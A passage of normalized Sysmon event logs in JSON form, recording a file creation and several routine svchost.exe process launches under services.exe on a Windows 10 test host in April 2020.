22:19:17.764\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00106b420100}\"},{\"Name\":\"ProcessId\",\"text\":\"2056\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\DeliveryOptimization\\\\Logs\\\\dosvc.20200425_221917_750.etl\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:19:17.750\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": 
"c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\microsoft\\windows\\deliveryoptimization\\logs\\dosvc.20200425_221917_750.etl", "object.name": "dosvc.20200425_221917_750.etl", "object.path": "c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\microsoft\\windows\\deliveryoptimization\\logs\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:17.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b765-5ea4-0000-00106b420100", "subject.process.id": "2056", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.764Z", "type": "raw", "uuid": "f8002c1b-a361-4a83-ad22-f8dfb6a5afb6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4732530Z\"},\"EventRecordID\":\"27565\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.709\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010aa430100}\"},{\"Name\":\"ProcessId\",\"text\":\"2076\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 
(WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, 
"object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetworkFirewall -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010aa430100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2076", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", 
"time": "2020-04-25T22:19:17.709Z", "type": "raw", "uuid": "32a9d070-2b4c-4b27-afcc-bf150c798a0b"}
+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.1985843Z\"},\"EventRecordID\":\"27554\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.652\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00100b390100}\"},{\"Name\":\"ProcessId\",\"text\":\"1552\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00100b390100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1552", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.652Z", "type": "raw", "uuid": "b96c72ff-90d2-424f-83fa-c0defe83eaa2"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.1966161Z\"},\"EventRecordID\":\"27553\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.650\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00107a380100}\"},{\"Name\":\"ProcessId\",\"text\":\"1440\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00107a380100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1440", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.650Z", "type": "raw", "uuid": "a1218116-4848-45d8-b901-d0a2fe6b932b"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6526907Z\"},\"EventRecordID\":\"27545\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.585\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010572d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1996\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010572d0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1996", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.585Z", "type": "raw", "uuid": "495f87c3-592a-44f3-86ec-0e565eac50bb"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6458706Z\"},\"EventRecordID\":\"27541\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.554\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010be260100}\"},{\"Name\":\"ProcessId\",\"text\":\"1936\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010be260100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1936", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.554Z", "type": "raw", "uuid": "6d74d78b-23b3-4b8c-aecd-f76b5dae7056"}
+{"action": "start", "body": 
